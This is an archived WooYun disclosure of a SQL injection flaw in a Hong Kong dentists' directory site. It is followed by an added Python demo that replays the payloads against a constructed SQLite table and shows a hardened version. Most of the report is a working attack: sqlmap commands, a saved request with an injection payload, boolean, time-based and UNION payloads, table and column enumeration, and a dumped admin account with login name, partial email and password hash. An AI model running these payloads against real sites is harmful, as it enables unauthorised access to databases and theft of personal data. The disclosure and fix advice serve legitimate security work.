WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader -------------------- http://drop.zone.ci/
2015-12-16: Details reported to the vendor; awaiting vendor response
2015-12-18: Vendor confirmed the issue; details visible to the vendor only
2015-12-28: Details disclosed to core white hats and experts in the relevant field
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public
SQL injection vulnerability in the Hong Kong Dentists website (香港牙醫網)
Test URL: http://**.**.**.**/index.php?actiontype=search&language=eng&dentist_name=hui&clinic_dist=2
The search request was saved to 3.txt and handed to sqlmap with the injection point restricted to the clinic_dist parameter:

sqlmap -r 3.txt -p clinic_dist

3.txt:
GET /index.php?actiontype=search&language=eng&dentist_name=hui&clinic_dist=222%27%20or%20(select%201)%20and%20%271%27=%271 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=34d7102b2a211b4e59ccc39880963bcf
Connection: keep-alive

Note that the saved request already carries a manually confirmed boolean payload in clinic_dist (URL-decoded: 222' or (select 1) and '1'='1); sqlmap's own test payloads below are appended to that value, which is why every Payload line starts with it.

Once the injection was confirmed, the users table of the enumerated database was dumped:

sqlmap -r 3.txt -p clinic_dist -D hkdentis_aosDBdentist -T hkdentists_users --dump
---
Parameter: clinic_dist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND 4779=4779 AND 'UBUb'='UBUb

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND (SELECT * FROM (SELECT(SLEEP(5)))emwE) AND 'Ibdz'='Ibdz

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a707671,0x586f68664d4d4c597870,0x7170706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web application technology: Apache
back-end DBMS: MySQL 5.0.12
current user: 'aosDBdentist@localhost'
current database: 'hkdentis_aosDBdentist'
hostname: '**.**.**.**'
current user is DBA: False
database management system users [1]:
[*] 'aosDBdentist'@'localhost'
back-end DBMS: MySQL 5.0.12
Database: hkdentis_aosDBdentist
[12 tables]
+--------------------------+
| aos_directory_dchk       |
| aos_hk_area              |
| hkdentists_advertisement |
| hkdentists_clinic        |
| hkdentists_dentist_quali |
| hkdentists_dentists      |
| hkdentists_district      |
| hkdentists_documents     |
| hkdentists_licenses      |
| hkdentists_qualification |
| hkdentists_searchlog     |
| hkdentists_users         |
+--------------------------+

web application technology: Apache
back-end DBMS: MySQL 5.0.12
Database: hkdentis_aosDBdentist
Table: hkdentists_users
[17 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| address1   | varchar(100) |
| address2   | varchar(100) |
| city       | varchar(50)  |
| email      | varchar(50)  |
| fax        | varchar(30)  |
| firstname  | varchar(50)  |
| id         | int(11)      |
| jobtitle   | varchar(50)  |
| last_login | int(11)      |
| lastname   | varchar(50)  |
| login_name | varchar(50)  |
| mobile     | varchar(30)  |
| password   | varchar(50)  |
| phone      | varchar(30)  |
| role       | tinyint(1)   |
| status     | tinyint(4)   |
| title      | varchar(10)  |
+------------+--------------+

sqlmap resumed the following injection point(s) from stored session:
(the same three injection points on clinic_dist listed above)

web application technology: Apache
back-end DBMS: MySQL 5.0.12
Database: hkdentis_aosDBdentist
Table: hkdentists_users
[1 entry]
+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+
| id | fax      | city      | role | title | phone   | email               | status | mobile  | address1 | address2 | lastname | jobtitle   | password                         | firstname | login_name | last_login |
+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+
| 1  | 30072787 | Hong Kong | 1    | Mr.   | <blank> | chester@**.**.**.** | 1      | <blank> | <blank>  | <blank>  | Cheng    | Programmer | f4d0fcce6d1c8bf3bd19ac39da0bfed6 | Chester   | admin      | 1449221493 |
+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+
Fix recommendation: filter the input. clinic_dist is a district number, so reject anything that is not an integer, and pass both search values to the database as bound parameters instead of concatenating them into the query string; the 32-character hex password column in the dump also suggests an unsalted single-round hash, which should be replaced by a proper password hash once the injection is closed.
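The following is an added example, not code from the report or from the affected site. It reconstructs the query shape the sqlmap verdict implies (the page never shows the site's PHP, so the concatenated query is an assumption), replays the report's boolean oracle against a constructed in-memory SQLite table, adds an illustrative UNION payload standing in for sqlmap's dump step (column count adjusted to this two-column query), and shows the hardened version: an integer check on clinic_dist plus bound parameters. Table names, rows and the "users" row are constructed stand-ins, not the dumped data.

```python
import sqlite3

# Constructed sample data standing in for the site's dentist directory and
# user table; table names and rows are illustrative, not the real schema.
DENTISTS = [
    (1, "Hui Wing", 2),
    (2, "Hui Ka", 3),
    (3, "Chan Mei", 2),
]
USERS = [
    (1, "admin", "not-a-real-hash"),
]


def make_db():
    """In-memory SQLite database loaded with the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE dentists (id INTEGER, name TEXT, district INTEGER);"
        "CREATE TABLE users (id INTEGER, login_name TEXT, password TEXT);"
    )
    db.executemany("INSERT INTO dentists VALUES (?, ?, ?)", DENTISTS)
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return db


def search_vulnerable(db, dentist_name, clinic_dist):
    """Query built by string concatenation (assumed reconstruction).

    Both request parameters are spliced straight into the WHERE clause, so
    a quote in clinic_dist ends the literal and the rest becomes SQL.
    """
    sql = (
        "SELECT id, name FROM dentists WHERE name LIKE '%" + dentist_name
        + "%' AND district = '" + clinic_dist + "'"
    )
    return db.execute(sql).fetchall()


def is_valid_district(clinic_dist):
    """clinic_dist is a district number in the report; accept digits only."""
    return clinic_dist.isdigit()


def search_hardened(db, dentist_name, clinic_dist):
    """Validate the district id, then bind both values as parameters.

    Bound parameters alone neutralise the payloads below (the value is
    compared as a district, never parsed as SQL); the digit check also
    rejects junk before it reaches the database.
    """
    if not is_valid_district(clinic_dist):
        raise ValueError("clinic_dist must be a district number")
    sql = "SELECT id, name FROM dentists WHERE name LIKE ? AND district = ?"
    params = ("%" + dentist_name + "%", int(clinic_dist))
    return db.execute(sql, params).fetchall()


# The first two payloads are the report's boolean oracle (true and false
# variants): AND binds tighter than OR, so "or (select 1) and '1'='1'" makes
# the whole WHERE true and returns every row, while '1'='2' returns none.
# The UNION payload is an illustrative stand-in for sqlmap's dump step.
PAYLOAD_TRUE = "222' or (select 1) and '1'='1"
PAYLOAD_FALSE = "222' or (select 1) and '1'='2"
PAYLOAD_UNION = "222' UNION SELECT login_name, password FROM users -- "


def demo():
    """Run each case and return the result rows keyed by label."""
    db = make_db()
    return {
        "legit": search_vulnerable(db, "hui", "2"),
        "no_such_district": search_vulnerable(db, "hui", "222"),
        "blind_true": search_vulnerable(db, "hui", PAYLOAD_TRUE),
        "blind_false": search_vulnerable(db, "hui", PAYLOAD_FALSE),
        "union_dump": search_vulnerable(db, "hui", PAYLOAD_UNION),
        "hardened_legit": search_hardened(db, "hui", "2"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:18} -> {rows}")
```

The difference between the blind_true and blind_false results is exactly the one-bit oracle sqlmap's boolean-based technique relies on; the time-based variant on the page (SLEEP(5)) is MySQL-specific and is not reproduced in SQLite. Passing PAYLOAD_TRUE to search_hardened raises ValueError before any query runs.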
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-12-18 18:19
Vendor response: The incident has been reported to the relevant organization.
Remarks: none yet